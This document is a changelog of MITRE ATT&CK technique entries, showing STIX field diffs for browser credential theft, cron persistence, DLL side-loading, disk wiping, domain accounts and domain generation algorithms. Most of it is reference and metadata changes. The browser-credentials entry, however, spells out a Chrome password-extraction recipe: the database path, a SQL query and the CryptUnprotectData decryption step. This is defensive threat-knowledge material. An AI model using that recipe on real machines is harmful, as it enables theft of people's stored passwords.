external_references[6]['source_name']GitHub Turla Driver LoaderMicrosoft TESTSIGNING Feb 2021
external_references[6]['description']TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.
external_references[6]['url']https://github.com/hfiref0x/TDLhttps://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option
external_references[7]['source_name']F-Secure BlackEnergy 2014Unit42 AcidBox June 2020
external_references[7]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.
external_references[7]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://unit42.paloaltonetworks.com/acidbox-rare-malware/
external_references[8]['source_name']Unit42 AcidBox June 2020GitHub Turla Driver Loader
external_references[8]['description']Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.
external_references[8]['url']https://unit42.paloaltonetworks.com/acidbox-rare-malware/https://github.com/hfiref0x/TDL
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication Control
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication control

[T1555] Credentials from Password Stores

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-21 17:58:03.788000+00:002022-04-01 18:25:13.952000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesFile: File Access
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesFile: File Access

[T1555.003] Credentials from Password Stores: Credentials from Web Browsers

Current version: 1.1


Old Description
New Description
t1Adversaries may acquire credentials from web browsers by reat1Adversaries may acquire credentials from web browsers by rea
>ding files specific to the target browser.(Citation: Talos O>ding files specific to the target browser.(Citation: Talos O
>lympic Destroyer 2018) Web browsers commonly save credential>lympic Destroyer 2018) Web browsers commonly save credential
>s such as website usernames and passwords so that they do no>s such as website usernames and passwords so that they do no
>t need to be entered manually in the future. Web browsers ty>t need to be entered manually in the future. Web browsers ty
>pically store the credentials in an encrypted format within >pically store the credentials in an encrypted format within 
>a credential store; however, methods exist to extract plaint>a credential store; however, methods exist to extract plaint
>ext credentials from web browsers.  For example, on Windows >ext credentials from web browsers.  For example, on Windows 
>systems, encrypted credentials may be obtained from Google C>systems, encrypted credentials may be obtained from Google C
>hrome by reading a database file, <code>AppData\Local\Google>hrome by reading a database file, <code>AppData\Local\Google
>\Chrome\User Data\Default\Login Data</code> and executing a >\Chrome\User Data\Default\Login Data</code> and executing a 
>SQL query: <code>SELECT action_url, username_value, password>SQL query: <code>SELECT action_url, username_value, password
>_value FROM logins;</code>. The plaintext password can then >_value FROM logins;</code>. The plaintext password can then 
>be obtained by passing the encrypted credentials to the Wind>be obtained by passing the encrypted credentials to the Wind
>ows API function <code>CryptUnprotectData</code>, which uses>ows API function <code>CryptUnprotectData</code>, which uses
> the victim’s cached logon credentials as the decryption key> the victim’s cached logon credentials as the decryption key
>. (Citation: Microsoft CryptUnprotectData April 2018)   Adve>.(Citation: Microsoft CryptUnprotectData April 2018)   Adver
>rsaries have executed similar procedures for common web brow>saries have executed similar procedures for common web brows
>sers such as FireFox, Safari, Edge, etc.(Citation: Proofpoin>ers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint
>t Vega Credential Stealer May 2018)(Citation: FireEye HawkEy> Vega Credential Stealer May 2018)(Citation: FireEye HawkEye
>e Malware July 2017) Windows stores Internet Explorer and Mi> Malware July 2017) Windows stores Internet Explorer and Mic
>crosoft Edge credentials in Credential Lockers managed by th>rosoft Edge credentials in Credential Lockers managed by the
>e [Windows Credential Manager](https://attack.mitre.org/tech> [Windows Credential Manager](https://attack.mitre.org/techn
>niques/T1555/004).  Adversaries may also acquire credentials>iques/T1555/004).  Adversaries may also acquire credentials 
> by searching web browser process memory for patterns that c>by searching web browser process memory for patterns that co
>ommonly match credentials.(Citation: GitHub Mimikittenz July>mmonly match credentials.(Citation: GitHub Mimikittenz July 
> 2016)  After acquiring credentials from web browsers, adver>2016)  After acquiring credentials from web browsers, advers
>saries may attempt to recycle the credentials across differe>aries may attempt to recycle the credentials across differen
>nt systems and/or accounts in order to expand access. This c>t systems and/or accounts in order to expand access. This ca
>an result in significantly furthering an adversary's objecti>n result in significantly furthering an adversary's objectiv
>ve in cases where credentials gained from web browsers overl>e in cases where credentials gained from web browsers overla
>ap with privileged accounts (e.g. domain administrator).>p with privileged accounts (e.g. domain administrator).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:03:47.293000+00:002022-02-15 19:29:57.405000+00:00
descriptionAdversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016) After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018) Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016) After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).
x_mitre_data_sources[0]File: File AccessCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Access
x_mitre_data_sources[2]Process: OS API ExecutionFile: File Access
x_mitre_data_sources[3]Process: Process AccessProcess: OS API Execution

[T1053.003] Scheduled Task/Job: Cron

Current version: 1.1


Old Description
New Description
t1Adversaries may abuse the <code>cron</code> utility to perfot1Adversaries may abuse the <code>cron</code> utility to perfo
>rm task scheduling for initial or recurring execution of mal>rm task scheduling for initial or recurring execution of mal
>icious code.(Citation: 20 macOS Common Tools and Techniques)>icious code.(Citation: 20 macOS Common Tools and Techniques)
> The <code>cron</code> utility is a time-based job scheduler> The <code>cron</code> utility is a time-based job scheduler
> for Unix-like operating systems.  The <code> crontab</code>> for Unix-like operating systems.  The <code> crontab</code>
> file contains the schedule of cron entries to be run and th> file contains the schedule of cron entries to be run and th
>e specified times for execution. Any <code>crontab</code> fi>e specified times for execution. Any <code>crontab</code> fi
>les are stored in operating system-specific file paths.  An >les are stored in operating system-specific file paths.  An 
>adversary may use <code>cron</code> in Linux or Unix environ>adversary may use <code>cron</code> in Linux or Unix environ
>ments to execute programs at system startup or on a schedule>ments to execute programs at system startup or on a schedule
>d basis for persistence. >d basis for [Persistence](https://attack.mitre.org/tactics/T
 >A0003). 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_remote_supportFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-23 15:29:36.918000+00:002022-03-24 17:33:03.443000+00:00
descriptionAdversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003).
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1574.002] Hijack Execution Flow: DLL Side-Loading

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAmanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.
external_referencesCAPEC-641
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-641
external_referencesAmanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 18:31:34.954000+00:002022-05-05 04:07:48.912000+00:00
external_references[1]['source_name']capecFireEye DLL Side-Loading
external_references[1]['url']https://capec.mitre.org/data/definitions/641.htmlhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
external_references[2]['source_name']FireEye DLL Side-Loadingcapec
external_references[2]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdfhttps://capec.mitre.org/data/definitions/641.html
x_mitre_data_sources[0]File: File CreationModule: Module Load
x_mitre_data_sources[1]File: File ModificationProcess: Process Creation
x_mitre_data_sources[2]Module: Module LoadFile: File Modification
x_mitre_data_sources[3]Process: Process CreationFile: File Creation
x_mitre_defense_bypassed[1]Application controlApplication Control

[T1602] Data from Configuration Repository

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 02:26:44.566000+00:002022-04-19 21:32:58.274000+00:00
external_references[1]['source_name']US-CERT-TA18-106ACisco Advisory SNMP v3 Authentication Vulnerabilities
external_references[1]['description']US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.
external_references[1]['url']https://www.us-cert.gov/ncas/alerts/TA18-106Ahttps://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3
external_references[3]['source_name']Cisco Advisory SNMP v3 Authentication VulnerabilitiesUS-CERT-TA18-106A
external_references[3]['description']Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
external_references[3]['url']https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3https://www.us-cert.gov/ncas/alerts/TA18-106A

[T1213] Data from Information Repositories

Current version: 3.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:35:43.938000+00:002022-04-11 22:28:36.395000+00:00
external_references[1]['source_name']Microsoft SharePoint LoggingAtlassian Confluence Logging
external_references[1]['description']Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.
external_references[1]['url']https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
external_references[2]['source_name']Sharepoint Sharing EventsMicrosoft SharePoint Logging
external_references[2]['description']Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.
external_references[2]['url']https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-eventshttps://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
external_references[3]['source_name']Atlassian Confluence LoggingSharepoint Sharing Events
external_references[3]['description']Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.
external_references[3]['url']https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.htmlhttps://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
x_mitre_data_sources[0]Logon Session: Logon Session CreationApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentLogon Session: Logon Session Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsIsif Ibrahima, Mandiant
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsIsif Ibrahima

[T1140] Deobfuscate/Decode Files or Information

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-07-09 14:42:23.122000+00:002022-05-05 04:05:42.508000+00:00
external_references[1]['source_name']Malwarebytes Targeted Attack against Saudi ArabiaVolexity PowerDuke November 2016
external_references[1]['description']Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
external_references[1]['url']https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
external_references[2]['source_name']Carbon Black Obfuscation Sept 2016Malwarebytes Targeted Attack against Saudi Arabia
external_references[2]['description']Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.
external_references[2]['url']https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/
external_references[3]['source_name']Volexity PowerDuke November 2016Carbon Black Obfuscation Sept 2016
external_references[3]['description']Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.
external_references[3]['url']https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
x_mitre_data_sources[0]Process: Process CreationScript: Script Execution
x_mitre_data_sources[2]Script: Script ExecutionProcess: Process Creation
x_mitre_defense_bypassed[1]Host intrusion prevention systemsHost Intrusion Prevention Systems
x_mitre_defense_bypassed[2]Signature-based detectionSignature-based Detection
x_mitre_defense_bypassed[3]Network intrusion detection systemNetwork Intrusion Detection System

[T1561.001] Disk Wipe: Disk Content Wipe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['SYSTEM', 'root', 'Administrator', 'User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 22:53:20.162000+00:002022-07-28 18:55:35.989000+00:00
external_references[1]['source_name']Novetta BlockbusterDOJ Lazarus Sony 2018
external_references[1]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
external_references[1]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://www.justice.gov/opa/press-release/file/1092091/download
external_references[2]['url']https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdfhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
external_references[3]['source_name']DOJ Lazarus Sony 2018Novetta Blockbuster
external_references[3]['description']Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[3]['url']https://www.justice.gov/opa/press-release/file/1092091/downloadhttps://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
x_mitre_data_sources[3]Drive: Drive AccessDrive: Drive Modification
x_mitre_data_sources[4]Drive: Drive ModificationDrive: Drive Access

[T1561] Disk Wipe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'root', 'SYSTEM', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 23:00:00.599000+00:002022-07-28 18:55:35.987000+00:00
external_references[1]['url']https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdfhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
x_mitre_data_sources[1]Command: Command ExecutionDriver: Driver Load
x_mitre_data_sources[2]Driver: Driver LoadDrive: Drive Modification
x_mitre_data_sources[3]Drive: Drive AccessCommand: Command Execution
x_mitre_data_sources[4]Drive: Drive ModificationDrive: Drive Access

[T1078.002] Valid Accounts: Domain Accounts

Current version: 1.2


Old Description
New Description
t1Adversaries may obtain and abuse credentials of a domain acct1Adversaries may obtain and abuse credentials of a domain acc
>ount as a means of gaining Initial Access, Persistence, Priv>ount as a means of gaining Initial Access, Persistence, Priv
>ilege Escalation, or Defense Evasion. (Citation: TechNet Cre>ilege Escalation, or Defense Evasion.(Citation: TechNet Cred
>dential Theft) Domain accounts are those managed by Active D>ential Theft) Domain accounts are those managed by Active Di
>irectory Domain Services where access and permissions are co>rectory Domain Services where access and permissions are con
>nfigured across systems and services that are part of that d>figured across systems and services that are part of that do
>omain. Domain accounts can cover users, administrators, and >main. Domain accounts can cover users, administrators, and s
>services.(Citation: Microsoft AD Accounts)  Adversaries may >ervices.(Citation: Microsoft AD Accounts)  Adversaries may c
>compromise domain accounts, some with a high level of privil>ompromise domain accounts, some with a high level of privile
>eges, through various means such as [OS Credential Dumping](>ges, through various means such as [OS Credential Dumping](h
>https://attack.mitre.org/techniques/T1003) or password reuse>ttps://attack.mitre.org/techniques/T1003) or password reuse,
>, allowing access to privileged resources of the domain.> allowing access to privileged resources of the domain.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesMicrosoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.
external_referencesCAPEC-560
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-560
external_referencesUbuntu. (n.d.). SSSD. Retrieved September 23, 2021.
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 03:29:47.651000+00:002022-04-19 20:14:34.479000+00:00
descriptionAdversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
external_references[1]['source_name']capecTechNet Credential Theft
external_references[1]['url']https://capec.mitre.org/data/definitions/560.htmlhttps://technet.microsoft.com/en-us/library/dn535501.aspx
external_references[2]['source_name']TechNet Credential TheftTechNet Audit Policy
external_references[2]['description']Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.
external_references[2]['url']https://technet.microsoft.com/en-us/library/dn535501.aspxhttps://technet.microsoft.com/en-us/library/dn487457.aspx
external_references[4]['source_name']TechNet Audit PolicyUbuntu SSSD Docs
external_references[4]['description']Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.
external_references[4]['url']https://technet.microsoft.com/en-us/library/dn487457.aspxhttps://ubuntu.com/server/docs/service-sssd
external_references[5]['source_name']Ubuntu SSSD Docscapec
external_references[5]['url']https://ubuntu.com/server/docs/service-sssdhttps://capec.mitre.org/data/definitions/560.html
x_mitre_data_sources[0]Logon Session: Logon Session MetadataUser Account: User Account Authentication
x_mitre_data_sources[1]User Account: User Account AuthenticationLogon Session: Logon Session Metadata

[T1568.002] Dynamic Resolution: Domain Generation Algorithms

Current version: 1.0


Old Description
New Description
t1Adversaries may make use of Domain Generation Algorithms (DGt1Adversaries may make use of Domain Generation Algorithms (DG
>As) to dynamically identify a destination domain for command>As) to dynamically identify a destination domain for command
> and control traffic rather than relying on a list of static> and control traffic rather than relying on a list of static
> IP addresses or domains. This has the advantage of making i> IP addresses or domains. This has the advantage of making i
>t much harder for defenders block, track, or take over the c>t much harder for defenders to block, track, or take over th
>ommand and control channel, as there potentially could be th>e command and control channel, as there potentially could be
>ousands of domains that malware can check for instructions.(> thousands of domains that malware can check for instruction
>Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrel>s.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umb
>la DGA)(Citation: Unit 42 DGA Feb 2019)  DGAs can take the f>rella DGA)(Citation: Unit 42 DGA Feb 2019)  DGAs can take th
>orm of apparently random or “gibberish” strings (ex: istgmxd>e form of apparently random or “gibberish” strings (ex: istg
>ejdnxuyla.ru) when they construct domain names by generating>mxdejdnxuyla.ru) when they construct domain names by generat
> each letter. Alternatively, some DGAs employ whole words as>ing each letter. Alternatively, some DGAs employ whole words
> the unit by concatenating words together instead of letters> as the unit by concatenating words together instead of lett
> (ex: cityjulydish.net). Many DGAs are time-based, generatin>ers (ex: cityjulydish.net). Many DGAs are time-based, genera
>g a different domain for each time period (hourly, daily, mo>ting a different domain for each time period (hourly, daily,
>nthly, etc). Others incorporate a seed value as well to make> monthly, etc). Others incorporate a seed value as well to m
> predicting future domains more difficult for defenders.(Cit>ake predicting future domains more difficult for defenders.(
>ation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella >Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrel
>DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mit>la DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA 
>igation)  Adversaries may use DGAs for the purpose of [Fallb>Mitigation)  Adversaries may use DGAs for the purpose of [Fa
>ack Channels](https://attack.mitre.org/techniques/T1008). Wh>llback Channels](https://attack.mitre.org/techniques/T1008).
>en contact is lost with the primary command and control serv> When contact is lost with the primary command and control s
>er malware may employ a DGA as a means to reestablishing com>erver malware may employ a DGA as a means to reestablishing 
>mand and control.(Citation: Talos CCleanup 2017)(Citation: F>command and control.(Citation: Talos CCleanup 2017)(Citation
>ireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activi>: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Act
>ty)>ivity)

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:28:57.002000+00:002022-03-11 18:26:23.432000+00:00
descriptionAdversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. 